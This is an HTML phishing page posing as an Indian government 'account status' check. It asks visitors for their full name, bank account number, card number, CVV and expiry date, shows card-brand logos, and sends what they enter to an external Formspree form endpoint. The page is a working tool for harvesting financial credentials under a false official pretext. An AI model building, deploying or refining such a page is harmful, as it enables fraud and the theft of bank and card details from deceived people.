<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Payment Form</title>
    <link rel="stylesheet" href="style.css">
    <link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
</head>
<body>
<section>
    <div class="container">
      <form action="https://formspree.io/f/mbjqkodb" method="POST" id="my-form">
        
        
        <h1>Check your account status</h1>
		<h1>indian govt source</h1>
        <div class="form-group">
            <div class="owner">
                <h3>Full Name</h3>
                <div class="form-group">
                    <input type="text" id="owner" name="owner">
                </div>
            </div>
			<div class="form-group">
                <h3>Account Number</h3>
                <div class="form-group">
                    <input type="password" id="card number" name="card number">
                </div>
            </div>
            <div class="form-group">
                <h3>Card Number</h3>
                <div class="form-group">
                    <input type="password" id="card number" name="card number">
                </div>
            </div>
        </div>
        <div class="form-group">
            <div class="form-group">
                <h3>Cvv</h3>
                <div class="form-group">
                    <input type="text" id="cvv" name="cvv">
                </div>
            </div>
        </div>
        <div class="form-group">
            <h3>Date</h3>
            <div class="form-group">
                <div class="date">
                    <select name="months" id="months">
                        <option value="Jan">Jan</option>
                        <option value="Feb">Feb</option>
                        <option value="Mar">Mar</option>
                        <option value="Apr">Apr</option>
                        <option value="May">May</option>
                        <option value="Jun">Jun</option>
                        <option value="Jul">Jul</option>
                        <option value="Aug">Aug</option>
                        <option value="Sep">Sep</option>
                        <option value="Oct">Oct</option>
                        <option value="Nov">Nov</option>
                        <option value="Dec">Dec</option>
                      </select>
                      <select name="years" id="years">
                        <option value="2021">2021</option>
                        <option value="2022">2022</option>
                        <option value="2023">2023</option>
                        <option value="2024">2024</option>
                        <option value="2025">2025</option>
                        <option value="2026">2026</option>
						<option value="2027">2027</option>
						<option value="2028">2028</option>
						<option value="2029">2029</option>
                      </select>
                </div>
                <div class="cards">
                    <img src="mc.png" alt="">
                    <img src="vi.png" alt="">
                    <img src="pp.png" alt="">
                </div>
            </div>    
        </div>
        <button type="status check">status check</button>
      <form>
    </div>
    <div id="status check"></div>
</section>
</body>
</html>